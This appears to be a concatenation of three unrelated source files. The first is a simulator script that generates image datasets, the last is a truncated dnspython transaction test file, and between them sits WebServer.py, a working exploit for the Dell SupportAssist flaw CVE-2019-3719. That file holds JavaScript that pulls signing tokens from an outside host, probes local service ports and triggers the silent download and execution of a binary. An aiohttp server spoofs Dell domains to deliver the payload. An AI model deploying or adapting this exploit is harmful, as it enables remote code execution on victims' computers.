self.screen_size = screen_size
self.output_size = output_size
self.show_objects = show_objects
self.clamp_rotation = clamp_rotation
self.max_height = max_height
self.grayscale_threshold = grayscale_threshold
self.id_pass = id_pass
self.no_overwrite = no_overwrite
self.do_zip = do_zip
self.train = train
self.val = val
assert 0 < max_height <= 1.0, f"Invalid max height: {max_height}"
assert 0 < grayscale_threshold <= 1.0, f"Invalid grayscale threshold: {grayscale_threshold}"
self.less_dark = less_dark
self.substructures: Dict[str, List[dict]] = {}
self.new = new
super().__init__(port=port, launch_build=launch_build)
self.model_librarian = ModelLibrarian(library=library)
self.material_librarian = MaterialLibrarian("materials_high.json")
self.hdri_skybox_librarian = HDRISkyboxLibrarian()
# Get material records.
if visual_material_swapping:
self.materials = self.material_librarian.records
else:
self.materials = None
# Get skybox records.
if hdri:
self.skyboxes = self.hdri_skybox_librarian.records
# Prefer exterior daytime skyboxes by adding them multiple times to the list.
if self.less_dark:
temp = self.skyboxes[:]
for skybox in temp:
if skybox.location != "interior" and skybox.sun_elevation >= 145:
self.skyboxes.append(skybox)
else:
self.skyboxes = None
# Download from pre-signed URLs.
if temp_urls:
self.communicate({"$type": "use_pre_signed_urls",
"value": True})
def initialize_scene(self, scene_command, a="a") -> list:
"""
Initialize the scene.
:param scene_command: The command to load the scene.
:param a: The avatar ID.
:return: The Environments data of the scene.
"""
# Initialize the scene.
# Add the avatar.
commands = [scene_command,
{"$type": "create_avatar",
"type": "A_Img_Caps_Kinematic",
"id": a,
"envs": [0]}]
# Disable physics.
# Enable jpgs.
# Set FOV.
# Set clipping planes.
# Set AA.
# Set aperture.
# Disable vignette.
commands.extend([{"$type": "simulate_physics",
"value": False},
{"$type": "set_img_pass_encoding",
"value": False},
{'$type': 'set_field_of_view',
'avatar_id': 'a',
'field_of_view': 60},
{'$type': 'set_camera_clipping_planes',
'avatar_id': 'a',
'far': 160,
'near': 0.01},
{"$type": "set_anti_aliasing",
"avatar_id": "a",
"mode": "subpixel"},
{"$type": "set_aperture",
"aperture": 70},
{'$type': 'set_vignette',
'enabled': False}])
# If we're using HDRI skyboxes, send additional favorable post-process commands.
if self.skyboxes is not None:
commands.extend([{"$type": "set_post_exposure",
"post_exposure": 0.6},
{"$type": "set_contrast",
"contrast": -20},
{"$type": "set_saturation",
"saturation": 10},
{"$type": "set_screen_space_reflections",
"enabled": False},
{"$type": "set_shadow_strength",
"strength": 1.0}])
# Send the commands.
self.communicate(commands)
# Get the environments data.
env_data = Environments(self.communicate({"$type": "send_environments",
"frequency": "once"})[0])
envs = []
for i in range(env_data.get_num()):
envs.append(Environment(env_data, i))
return envs
def generate_metadata(self, dataset_dir: str, scene_name: str) -> None:
"""
Generate a metadata file for this dataset.
:param dataset_dir: The dataset directory for images.
:param scene_name: The scene name.
"""
root_dir = f"{dataset_dir}/images/"
if not os.path.exists(root_dir):
os.makedirs(root_dir)
data = {"dataset": dataset_dir,
"scene": scene_name,
"train": self.train,
"val": self.val,
"visual_material_swapping": self.materials is not None,
"hdri": self.skyboxes is not None,
"screen_size": self.screen_size,
"output_size": self.output_size,
"clamp_rotation": self.clamp_rotation,
"show_objects": self.show_objects,
"max_height": self.max_height,
"grayscale_threshold": self.grayscale_threshold,
"less_dark": self.less_dark,
"multi_scene": self.no_overwrite,
"start": datetime.now().strftime("%H:%M %d.%m.%y")
}
with open(os.path.join(root_dir, "metadata.txt"), "wt") as f:
json.dump(data, f, sort_keys=True, indent=4)
def run(self, dataset_dir: str, scene_name: str) -> None:
"""
Generate the dataset.
:param dataset_dir: The dataset directory for images.
:param scene_name: The scene name.
"""
# Create the metadata file.
self.generate_metadata(dataset_dir,
scene_name=scene_name)
# The root directory of the output.
root_dir = f"{dataset_dir}/images/"
# The avatar ID.
a = "a"
# Initialize the scene.
envs = self.initialize_scene(self.get_add_scene(scene_name))
# Fetch the WordNet IDs.
wnids = self.model_librarian.get_model_wnids()
# Remove any wnids that don't have valid models.
wnids = [w for w in wnids if len(
[r for r in self.model_librarian.get_all_models_in_wnid(w) if not r.do_not_use]) > 0]
# Set the number of train and val images per wnid.
num_train = self.train / len(wnids)
num_val = self.val / len(wnids)
# Create the progress bar.
pbar = tqdm(total=len(wnids))
# If this is a new dataset, remove the previous list of completed models.
done_models_filename = "processed_records.txt"
if self.new and os.path.exists(done_models_filename):
os.remove(done_models_filename)
# Get a list of models that have already been processed.
processed_model_names = []
if os.path.exists(done_models_filename):
with open(done_models_filename, "rt") as f:
txt = f.read()
processed_model_names = txt.split("\n")
# Iterate through each wnid.
for w, q in zip(wnids, range(len(wnids))):
# Update the progress bar.
pbar.set_description(w)
# Get all valid models in the wnid.
records = self.model_librarian.get_all_models_in_wnid(w)
records = [r for r in records if not r.do_not_use]
# Get the train and val counts.
train_count = [len(a) for a in np.array_split(
np.arange(num_train), len(records))][0]
val_count = [len(a) for a in np.array_split(
np.arange(num_val), len(records))][0]
# Process each record.
fps = "nan"
for record, i in zip(records, range(len(records))):
# Set the progress bar description to the wnid and FPS.
pbar.set_description(f"record {i + 1}/{len(records)}, FPS {fps}")
# Skip models that have already been processed.
if record.name in processed_model_names:
continue
# Create all of the images for this model.
dt = self.process_model(record, a, envs, train_count, val_count, root_dir, w)
fps = round((train_count + val_count) / dt)
# Mark this record as processed.
with open(done_models_filename, "at") as f:
f.write(f"\n{record.name}")
pbar.update(1)
pbar.close()
# Add the end time to the metadata file.
with open(os.path.join(root_dir, "metadata.txt"), "rt") as f:
data = json.load(f)
end_time = datetime.now().strftime("%H:%M %d.%m.%y")
if "end" in data:
data["end"] = end_time
else:
data.update({"end": end_time})
with open(os.path.join(root_dir, "metadata.txt"), "wt") as f:
json.dump(data, f, sort_keys=True, indent=4)
# Terminate the build.
if not self.no_overwrite:
self.communicate({"$type": "terminate"})
# Zip up the images.
if self.do_zip:
zip_dir = Path(dataset_dir)
SingleObject.zip_images(zip_dir)
def set_skybox(self, records: List[HDRISkyboxRecord], its_per_skybox: int, hdri_index: int, skybox_count: int) -> (int, int, dict):
"""
If it's time, set a new skybox.
:param records: All HDRI records.
:param its_per_skybox: Iterations per skybox.
:param hdri_index: The index in the records list.
:param skybox_count: The number of images of this model with this skybox.
:return: (hdri_index, skybox_count, command used to set the skybox)
"""
# Set a new skybox.
if skybox_count == 0:
command = self.get_add_hdri_skybox(records[hdri_index].name)
# It's not time yet to set a new skybox. Don't send a command.
else:
command = None
skybox_count += 1
if skybox_count >= its_per_skybox:
hdri_index += 1
if hdri_index >= len(records):
hdri_index = 0
skybox_count = 0
return hdri_index, skybox_count, command
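# Note: set_skybox() above only returns a skybox command on the first call of
# each cycle; subsequent calls return None and just advance the per-skybox
# counter until its_per_skybox iterations have elapsed, then move on to the
# next HDRI record (wrapping around at the end of the list).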
def process_model(self, record: ModelRecord, a: str, envs: list, train_count: int, val_count: int,
root_dir: str, wnid: str) -> float:
"""
Capture images of a model.
:param record: The model record.
:param a: The ID of the avatar.
:param envs: All environment data.
:param train_count: Number of train images.
:param val_count: Number of val images.
:param root_dir: The root directory for saving images.
:param wnid: The wnid of the record.
:return: The time elapsed.
"""
image_count = 0
# Get the filename index. If we shouldn't overwrite any images, start after the last image.
if self.no_overwrite:
# Check if any images exist.
wnid_dir = Path(root_dir).joinpath(f"train/{wnid}")
if wnid_dir.exists():
max_file_index = -1
for image in wnid_dir.iterdir():
if not image.is_file() or image.suffix != ".jpg" \
or not image.stem.startswith("img_") or image.stem[4:-5] != record.name:
continue
image_index = int(image.stem[-4:])
if image_index > max_file_index:
max_file_index = image_index
file_index = max_file_index + 1
else:
file_index = 0
else:
file_index = 0
image_positions = []
o_id = self.get_unique_id()
s = TDWUtils.get_unit_scale(record)
# Add the object.
# Set the screen size to 32x32 (to make the build run faster; we only need the average grayscale values).
# Toggle off pass masks.
# Set render quality to minimal.
# Scale the object to "unit size".
self.communicate([{"$type": "add_object",
"name": record.name,
"url": record.get_url(),
"scale_factor": record.scale_factor,
"category": record.wcategory,
"id": o_id},
{"$type": "set_screen_size",
"height": 32,
"width": 32},
{"$type": "set_pass_masks",
"avatar_id": a,
"pass_masks": []},
{"$type": "set_render_quality",
"render_quality": 0},
{"$type": "scale_object",
"id": o_id,
"scale_factor": {"x": s, "y": s, "z": s}}])
# The index in the HDRI records array.
hdri_index = 0
# The number of iterations on this skybox so far.
skybox_count = 0
if self.skyboxes:
# The number of iterations per skybox for this model.
its_per_skybox = round((train_count + val_count) / len(self.skyboxes))
# Set the first skybox.
hdri_index, skybox_count, command = self.set_skybox(self.skyboxes, its_per_skybox, hdri_index, skybox_count)
self.communicate(command)
else:
its_per_skybox = 0
while len(image_positions) < train_count + val_count:
e = RNG.choice(envs)
# Get the real grayscale.
g_r, d, a_p, o_p, o_rot, cam_rot = self.get_real_grayscale(o_id, a, e)
if g_r > 0:
# Get the optimal grayscale.
g_o = self.get_optimal_grayscale(o_id, a, o_p, a_p)
if g_o > 0 and g_r / g_o > self.grayscale_threshold:
# Cache the position.
image_positions.append(ImagePosition(a_p, cam_rot, o_p, o_rot))
# Send images.
# Set the screen size.
# Set render quality to maximum.
commands = [{"$type": "send_images",
"frequency": "always"},
{"$type": "set_pass_masks",
"avatar_id": a,
"pass_masks": ["_img", "_id"] if self.id_pass else ["_img"]},
{"$type": "set_screen_size",
"height": self.screen_size,
"width": self.screen_size},
{"$type": "set_render_quality",
"render_quality": 5}]
# Hide the object maybe.
if not self.show_objects:
commands.append({"$type": "hide_object",
"id": o_id})
self.communicate(commands)
t0 = time()
# Generate images from the cached spatial data.
train = 0
for p in image_positions:
# Teleport the avatar.
# Rotate the avatar's camera.
# Teleport the object.
# Rotate the object.
# Get the response.
commands = [{"$type": "teleport_avatar_to",
"avatar_id": a,
"position": p.avatar_position},
{"$type": "rotate_sensor_container_to",
"avatar_id": a,
"rotation": p.camera_rotation},
{"$type": "teleport_object",
"id": o_id,
"position": p.object_position},
{"$type": "rotate_object_to",
"id": o_id,
"rotation": p.object_rotation}]
# Set the visual materials.
if self.materials is not None:
if record.name not in self.substructures:
self.substructures.update({record.name: record.substructure})
for sub_object in self.substructures[record.name]:
for i in range(len(sub_object["materials"])):  # assumes each substructure entry lists its material slots under "materials"; the original line indexed a list with a string and would raise TypeError
material_name = self.materials[RNG.randint(0, len(self.materials))].name
commands.extend([self.get_add_material(material_name),
{"$type": "set_visual_material",
"id": o_id,
"material_name": material_name,
"object_name": sub_object["name"],
"material_index": i}])
# Maybe set a new skybox.
# Rotate the skybox.
if self.skyboxes:
hdri_index, skybox_count, command = self.set_skybox(self.skyboxes, its_per_skybox, hdri_index, skybox_count)
if command:
commands.append(command)
commands.append({"$type": "rotate_hdri_skybox_by",
"angle": RNG.uniform(0, 360)})
resp = self.communicate(commands)
# Create a thread to save the image.
t = Thread(target=self.save_image, args=(resp, record, file_index, root_dir, wnid, train, train_count))
t.daemon = True
t.start()
train += 1
file_index += 1
image_count += 1
t1 = time()
# Stop sending images.
# Destroy the object.
# Unload asset bundles.
self.communicate([{"$type": "send_images",
"frequency": "never"},
{"$type": "destroy_object",
"id": o_id},
{"$type": "unload_asset_bundles"}])
return t1 - t0
def save_image(self, resp, record: ModelRecord, image_count: int, root_dir: str, wnid: str, train: int, train_count: int) -> None:
"""
Save an image.
:param resp: The raw response data.
:param record: The model record.
:param image_count: The image count.
:param root_dir: The root directory.
:param wnid: The wnid.
:param train: Number of train images so far.
:param train_count: Total number of train images to generate.
"""
# Get the directory.
directory = Path(root_dir).joinpath("train" if train < train_count else "val").joinpath(wnid).resolve()
if not os.path.exists(directory):
# Try to make the directories. Due to threading, they might already be made.
try:
os.makedirs(directory)
except:
pass
# Save the image.
filename = f"{record.name}_{image_count:04d}"
# Save the image without resizing.
if self.screen_size == self.output_size:
TDWUtils.save_images(Images(resp[0]), filename,
output_directory=directory)
# Resize the image and save it.
else:
TDWUtils.save_images(Images(resp[0]), filename,
output_directory=directory,
resize_to=(self.output_size, self.output_size))
def get_optimal_grayscale(self, o_id: int, a_id: str, o_p: dict, a_p: dict) -> float:
"""
Get the "optimal" grayscale value of the object if there wasn't any occlusion.
:param o_id: The ID of the object.
:param a_id: The ID of the avatar.
:param o_p: The position of the object.
:param a_p: The position of the avatar.
:return: The grayscale value.
"""
# Teleport the object into the sky.
# Teleport the avatar into the sky.
# Return the grayscale value.
return IdPassGrayscale(self.communicate([{"$type": "teleport_object",
"id": o_id,
"position": {"x": o_p["x"],
"y": o_p["y"] + 500,
"z": o_p["z"]}},
{"$type": "teleport_avatar_to",
"avatar_id": a_id,
"position": {"x": a_p["x"],
"y": a_p["y"] + 500,
"z": a_p["z"]}},
{"$type": "send_id_pass_grayscale",
"frequency": "once"}
])[0]).get_grayscale()
def get_real_grayscale(self, o_id: int, a_id: str, e: Environment) -> (float, float, dict, dict, dict, dict):
"""
Get the "real" grayscale value of an image we hope to capture.
:param o_id: The ID of the object.
:param a_id: The ID of the avatar.
:param e: The environment.
:return: (grayscale, distance, avatar_position, object_position, object_rotation, avatar_rotation)
"""
# Get a random position for the avatar.
a_p = np.array([RNG.uniform(-e.w / 2, e.w / 2) + e.x,
RNG.uniform(0.4, e.h * self.max_height),
RNG.uniform(-e.l / 2, e.l / 2) + e.z])
# Get a random distance from the avatar.
d = RNG.uniform(0.8, 3)
# Get a random position for the object constrained to the environment bounds.
o_p = SingleObject.sample_spherical() * d
# Clamp the y value to positive.
o_p[1] = abs(o_p[1])
o_p = a_p + o_p
# Clamp the y value of the object.
if o_p[1] > e.h * self.max_height:
o_p[1] = e.h * self.max_height
# Convert the avatar's position to a Vector3.
a_p = TDWUtils.array_to_vector3(a_p)
# Set random camera rotations.
yaw = RNG.uniform(-15, 15)
pitch = RNG.uniform(-15, 15)
# Convert the object position to a Vector3.
o_p = TDWUtils.array_to_vector3(o_p)
# Add rotation commands.
# If we're clamping the rotation, rotate the object within +/- 30 degrees on each axis.
if self.clamp_rotation:
o_rot = None
commands = [{"$type": "rotate_object_to",
"id": o_id,
"rotation": {"x": 0, "y": 0, "z": 0, "w": 0}},
{"$type": "rotate_object_by",
"id": o_id,
"angle": RNG.uniform(-30, 30),
"axis": "pitch"},
{"$type": "rotate_object_by",
"id": o_id,
"angle": RNG.uniform(-30, 30),
"axis": "yaw"},
{"$type": "rotate_object_by",
"id": o_id,
"angle": RNG.uniform(-30, 30),
"axis": "roll"}]
# Set a totally random rotation.
else:
o_rot = {"x": RNG.uniform(-360, 360),
"y": RNG.uniform(-360, 360),
"z": RNG.uniform(-360, 360),
"w": RNG.uniform(-360, 360),
}
commands = [{"$type": "rotate_object_to",
"id": o_id,
"rotation": o_rot}]
# After rotating the object:
# 1. Teleport the object.
# 2. Teleport the avatar.
# 3. Look at the object.
# 4. Perturb the camera slightly.
# 5. Send grayscale data and image sensor data.
commands.extend([{"$type": "teleport_object",
"id": o_id,
"position": o_p},
{"$type": "teleport_avatar_to",
"avatar_id": a_id,
"position": a_p},
{"$type": "look_at",
"avatar_id": a_id,
"object_id": o_id,
"use_centroid": True},
{"$type": "rotate_sensor_container_by",
"angle": pitch,
"avatar_id": "a",
"axis": "pitch"},
{"$type": "rotate_sensor_container_by",
"angle": yaw,
"avatar_id": "a",
"axis": "yaw"},
{"$type": "send_id_pass_grayscale",
"frequency": "once"},
{"$type": "send_image_sensors",
"frequency": "once"}])
resp = self.communicate(commands)
# Parse the output data:
# 1. The grayscale value of the image.
# 2. The camera rotation.
grayscale = 0
cam_rot = None
for r in resp[:-1]:
r_id = OutputData.get_data_type_id(r)
if r_id == "idgs":
grayscale = IdPassGrayscale(r).get_grayscale()
elif r_id == "imse":
cam_rot = ImageSensors(r).get_sensor_rotation(0)
cam_rot = {"x": cam_rot[0], "y": cam_rot[1], "z": cam_rot[2], "w": cam_rot[3]}
# If we clamped the rotation of the object, we need to know its quaternion.
if self.clamp_rotation:
resp = self.communicate({"$type": "send_transforms",
"frequency": "once",
"ids": [o_id]})
t = Transforms(resp[0])
o_rot = t.get_rotation(0)
o_rot = {"x": o_rot[0],
"y": o_rot[1],
"z": o_rot[2],
"w": o_rot[3],}
return grayscale, d, a_p, o_p, o_rot, cam_rot
@staticmethod
def sample_spherical(npoints=1, ndim=3) -> np.array:
vec = RNG.randn(ndim, npoints)
vec /= np.linalg.norm(vec, axis=0)
return np.array([vec[0][0], vec[1][0], vec[2][0]])
@staticmethod
def zip_images(zip_dir: Path) -> None:
"""
Zip up the images.
:param zip_dir: The zip directory.
"""
if not zip_dir.exists():
zip_dir.mkdir()
# Use a random token to avoid overwriting zip files.
token = token_urlsafe(4)
zip_path = zip_dir.joinpath(f"images_{token}.zip")
images_directory = str(zip_dir.joinpath("images").resolve())
# Create the zip file. If it is made, remove the original directory.
zip_call = f'C:/Program Files/7-Zip/7z.exe a -r {str(zip_path.resolve())} {images_directory} -sdel'
call(zip_call)
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("--scene_name", type=str, default="tdw_room",
help="The name of the scene. For a complete list: librarian.fetch_all_scene_records()")
parser.add_argument("--output_dir", type=str, default="D:/Test",
help="The absolute path to the output directory.")
parser.add_argument("--materials", action="store_true", help="Set random visual materials per frame.")
parser.add_argument("--new", action="store_true", help="Start a new dataset (erases the log of completed models).")
parser.add_argument("--screen_size", type=int, default=256, help="The screen size of the build.")
parser.add_argument("--output_size", type=int, default=256, help="Images are resized to this from the screen size.")
parser.add_argument("--hdri", action="store_true", help="Use a random HDRI skybox per frame.")
parser.add_argument("--hide", action="store_true", help="Hide all objects.")
parser.add_argument("--clamp_rotation", action="store_true",
help="Clamp rotation to +/- 30 degrees on each axis, rather than totally random.")
parser.add_argument("--port", type=int, default=1071, help="The port for the controller and build.")
parser.add_argument("--launch_build", action="store_true",
help="Automatically launch the build. "
"Don't add this if you're running the script on a Linux server.")
parser.add_argument("--max_height", type=float, default=1,
help="Objects and avatars can be at this percentage of the scene bounds height. Must be between 0 and 1.")
parser.add_argument("--grayscale", type=float, default=0.5,
help="Target grayscale value. Must be between 0 and 1. Higher value = better composition and slower FPS.")
parser.add_argument("--less_dark", action="store_true", help='Prefer fewer "dark" skyboxes.')
parser.add_argument("--id_pass", action="store_true", help="Include the _id pass.")
parser.add_argument("--no_overwrite", action="store_true",
help="If true, don't overwrite existing images, and start indexing after the highest index.")
parser.add_argument("--zip", action="store_true",
help="Zip the images after finishing the dataset. Requires Windows and 7zip.")
parser.add_argument("--train", type=int, default=1300000, help="Total number of train images.")
parser.add_argument("--val", type=int, default=50000, help="Total number of val images.")
parser.add_argument("--library", type=str, default="models_core.json", help="The path to the model library records.")
parser.add_argument("--temp_urls", action="store_true",
help="If included and `--library models_full.json`, the build will use temporary (pre-signed) "
"URLs to download models in the tdw-private bucket. "
"Include this flag only if you're experiencing segfaults on Linux.")
args = parser.parse_args()
s = SingleObject(port=args.port,
launch_build=args.launch_build,
visual_material_swapping=args.materials,
new=args.new,
screen_size=args.screen_size,
output_size=args.output_size,
hdri=args.hdri,
show_objects=not args.hide,
clamp_rotation=args.clamp_rotation,
max_height=args.max_height,
grayscale_threshold=args.grayscale,
less_dark=args.less_dark,
id_pass=args.id_pass,
no_overwrite=args.no_overwrite,
do_zip=args.zip,
train=args.train,
val=args.val,
library=args.library,
temp_urls=args.temp_urls)  # store_true already yields a bool; "is not None" was always True
s.run(args.output_dir,
scene_name=args.scene_name)
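# Example invocation (hypothetical values; see the argparse flags above):
# python single_object.py --scene_name tdw_room --output_dir D:/Test --hdri --materials --launch_build --train 1300000 --val 50000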
|
WebServer.py
|
from aiohttp import web
import asyncio
import string
import random
from threading import Thread
filename = ""
PAYLOAD = '''<script>var signatures = null;
var ports = [8884, 8883, 8886, 8885];
var server_port = 0;
function SendRequest(url) {
var x = new XMLHttpRequest();
x.open("GET", url, false);
//x.timeout = 3500;
x.send(null);
return {status: x.status, text: x.responseText};
}
function SendAsyncRequest(url, callback) {
var x = new XMLHttpRequest();
x.open("GET", url, true);
x.onreadystatechange = callback;
//x.timeout = 3500;
x.send(null);
return {status: x.status, text: x.responseText};
}
function InitializeSignatures() {
var signature_url = "https://bills-sandbox.000webhostapp.com/GetDellSignatures.php";
var response = SendRequest(signature_url);
if(response.status == 200) {
signatures = JSON.parse(response.text);
} else { // fuck this shouldn't happen
console.log("fuck");
}
}
function FindServer() {
ports.forEach(function(port) {
var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
});
}
function guid() {
function s4() {
return Math.floor((1 + Math.random()) * 0x10000)
.toString(16)
.substring(1);
}
return s4() + s4() + '-' + s4() + '-' + s4() + '-' + s4() + '-' + s4() + s4() + s4();
}
function SendRCEPayload() {
var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;
var xmlhttp = new XMLHttpRequest(); // new HttpRequest instance
xmlhttp.open("POST", auto_install_url, true);
var files = [];
files.push({
"title": "SupportAssist RCE",
"category": "Serial ATA",
"name": "calc.EXE",
"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
"isSecure": false,
"fileUniqueId": guid(),
"run": true,
"installOrder": 2,
"restricted": false,
"fileStatus": -99,
"driverId": "FXGNY",
"dupInstallReturnCode": 0,
"cssClass": "inactive-step",
"isReboot": false,
"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
"$$hashKey": "object:210"});
xmlhttp.send(JSON.stringify(files));
}
function GetClientSystemInfo() {
var signature = signatures.ClientSystemInfoToken;
var expires = signatures.Expires;
var system_info_url = "http://127.0.0.1:" + server_port + "/clientservice/getclientsysteminfo?expires=" + signatures.Expires + "&signature=" + signatures.ClientSystemInfoToken + "&includeServiceTag=true&includeHealthInfo=true&includeCurrentsystemConfig=true";
SendAsyncRequest(system_info_url, function(){ console.log(this.responseText);});
}
var port_timer;
function onFindPort() {
clearTimeout(port_timer);
SendRCEPayload();
}
InitializeSignatures();
FindServer();
port_timer = setTimeout(function(){if(server_port != 0){onFindPort()}}, 200);</script><h1>CVE-2019-3719</h1>'''
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def handle(request):
global filename
global PAYLOAD
if request.headers["Host"] is not None:
if "downloads.dell.com" in request.headers["Host"]:
print("[+] Exploit binary requested.")
return web.FileResponse(filename)
elif "dell.com" in request.headers["Host"]:
print("[+] Exploit payload requested.")
return web.Response(text=PAYLOAD, headers={'Content-Type': 'text/html'})
redirect_url = "http://dellrce.dell.com"
return web.HTTPFound(redirect_url)
class WebServer:
def __init__(self, payload_filename):
global filename
filename = payload_filename
self.loop = asyncio.get_event_loop()
app = web.Application(debug=True)
app.add_routes([web.get('/{a:.*}', handle)])
handler = app.make_handler()
self.server = self.loop.create_server(handler, host='0.0.0.0', port=80)
self.server_thread = Thread(target=self.server_handler, args=(self,))
self.server_thread.start()
print("[+] Webserver started.")
def server_handler(self, arg):
self.loop.run_until_complete(self.server)
self.loop.run_forever()
|
test_transaction.py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import time
import pytest
import dns.name
import dns.rdata
import dns.rdataclass
import dns.rdatatype
import dns.rdataset
import dns.rrset
import dns.transaction
import dns.versioned
import dns.zone
class DB(dns.transaction.TransactionManager):
def __init__(self):
self.rdatasets = {}
def reader(self):
return Transaction(self, False, True)
def writer(self, replacement=False):
return Transaction(self, replacement, False)
def origin_information(self):
return (dns.name.from_text('example'), True, dns.name.empty)
def get_class(self):
return dns.rdataclass.IN
class Transaction(dns.transaction.Transaction):
def __init__(self, db, replacement, read_only):
super().__init__(db, replacement, read_only)
self.rdatasets = {}
if not replacement:
self.rdatasets.update(db.rdatasets)
@property
def db(self):
return self.manager
def _get_rdataset(self, name, rdtype, covers):
return self.rdatasets.get((name, rdtype, covers))
def _put_rdataset(self, name, rdataset):
self.rdatasets[(name, rdataset.rdtype, rdataset.covers)] = rdataset
def _delete_name(self, name):
remove = []
for key in self.rdatasets.keys():
if key[0] == name:
remove.append(key)
if len(remove) > 0:
for key in remove:
del self.rdatasets[key]
def _delete_rdataset(self, name, rdtype, covers):
del self.rdatasets[(name, rdtype, covers)]
def _name_exists(self, name):
for key in self.rdatasets.keys():
if key[0] == name:
return True
return False
def _changed(self):
if self.read_only:
return False
else:
return len(self.rdatasets) > 0
def _end_transaction(self, commit):
if commit:
self.db.rdatasets = self.rdatasets
def _set_origin(self, origin):
pass
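# The DB/Transaction pair above is a minimal in-memory backend for these tests:
# rdatasets live in a dict keyed by (name, rdtype, covers), and committing a
# writer simply replaces the DB's dict with the transaction's working copy.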
@pytest.fixture
def db():
db = DB()
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
db.rdatasets[(rrset.name, rrset.rdtype, 0)] = rrset
return db
def test_basic(db):
# successful txn
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
assert txn.name_exists(rrset.name)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
# rollback
with pytest.raises(Exception):
with db.writer() as txn:
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
raise Exception()
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
with db.writer() as txn:
txn.delete(rrset.name)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_get(db):
with db.writer() as txn:
content = dns.name.from_text('content', None)
rdataset = txn.get(content, dns.rdatatype.TXT)
assert rdataset is not None
assert rdataset[0].strings == (b'content',)
assert isinstance(rdataset, dns.rdataset.ImmutableRdataset)
def test_add(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
expected = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
expected
def test_replacement(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.replace(rrset2)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset2
def test_delete(db):
with db.writer() as txn:
txn.delete(dns.name.from_text('nonexistent', None))
content = dns.name.from_text('content', None)
content2 = dns.name.from_text('content2', None)
txn.delete(content)
assert not txn.name_exists(content)
txn.delete(content2, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'new-content')
txn.add(rrset)
assert txn.name_exists(content)
txn.delete(content, dns.rdatatype.TXT)
assert not txn.name_exists(content)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'new-content')
txn.delete(rrset)
content_keys = [k for k in db.rdatasets if k[0] == content]
assert len(content_keys) == 0
def test_delete_exact(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
txn.delete_exact(rrset)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_parameter_forms(db):
with db.writer() as txn:
foo = dns.name.from_text('foo', None)
rdataset = dns.rdataset.from_text('in', 'a', 300,
'10.0.0.1', '10.0.0.2')
rdata1 = dns.rdata.from_text('in', 'a', '10.0.0.3')
rdata2 = dns.rdata.from_text('in', 'a', '10.0.0.4')
txn.add(foo, rdataset)
txn.add(foo, 100, rdata1)
txn.add(foo, 30, rdata2)
expected = dns.rrset.from_text('foo', 30, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(foo, rdataset.rdtype, 0)] == \
expected
with db.writer() as txn:
txn.delete(foo, rdataset)
txn.delete(foo, rdata1)
txn.delete(foo, rdata2)
assert db.rdatasets.get((foo, rdataset.rdtype, 0)) \
is None
def test_bad_parameters(db):
with db.writer() as txn:
with pytest.raises(TypeError):
txn.add(1)
with pytest.raises(TypeError):
rrset = dns.rrset.from_text('bar', 300, 'in', 'txt', 'bar')
txn.add(rrset, 1)
with pytest.raises(ValueError):
foo = dns.name.from_text('foo', None)
rdata = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(foo, 0x80000000, rdata)
with pytest.raises(TypeError):
txn.add(foo)
with pytest.raises(TypeError):
txn.add()
with pytest.raises(TypeError):
txn.add(foo, 300)
with pytest.raises(TypeError):
txn.add(foo, 300, 'hi')
with pytest.raises(TypeError):
txn.add(foo, 'hi')
with pytest.raises(TypeError):
txn.delete()
with pytest.raises(TypeError):
txn.delete(1)
def test_cannot_store_non_origin_soa(db):
with pytest.raises(ValueError):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'SOA',
'. . 1 2 3 4 5')
txn.add(rrset)
example_text = """$TTL 3600
$ORIGIN example.
@ soa foo bar 1 2 3 4 5
@ ns ns1
@ ns ns2
